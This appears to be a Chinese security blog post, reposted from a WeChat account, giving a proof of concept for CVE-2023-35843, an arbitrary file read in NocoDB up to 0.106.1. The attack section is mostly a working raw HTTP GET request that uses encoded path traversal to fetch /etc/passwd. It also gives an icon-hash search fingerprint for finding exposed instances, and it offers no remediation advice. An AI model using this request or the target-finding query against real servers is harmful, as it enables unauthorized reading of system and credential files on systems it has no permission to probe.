2024年5月14日22:55:24评论17 views字数 675阅读2分15秒阅读模式

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具，利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如果本公众号分享导致的侵权行为请告知，我们会立即删除并道歉。

NocoDB 任意文件读取漏洞(CVE-2023-35843 )

漏洞影响范围

NocoDB<=0.106.1

NocoDB 任意文件读取漏洞(CVE-2023-35843 )

漏洞复现

漏洞poc

GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

返回包出现如下数据代表漏洞存在

搜索语法

icon_hash="-2017596142"

原文始发于微信公众号（小白菜安全）：NocoDB 任意文件读取漏洞(CVE-2023-35843 )

左青龙
微信扫一扫

右白虎
微信扫一扫

NocoDB 任意文件读取漏洞(CVE-2023-35843 )

漏洞复现

搜索语法

Apache HTTP Server 源代码泄露漏洞CVE-2024-39884

Splunk Splunk Enterprise未授权路径遍历漏洞CVE-2024-36991

Apache Tomcat资源分配控制不当CVE-2024-34750

Apache Tomcat 资源分配控制不当

0day|GeoServer远程代码执行漏洞(CVE-2024-36401)

Geoserver最全历史漏洞详解

HTTP File Server代码执行漏洞(CVE-2024-23692)

【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）

[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞

Love-Yi情侣网站3.0存在SQL注入漏洞

发表评论

在线咨询

微信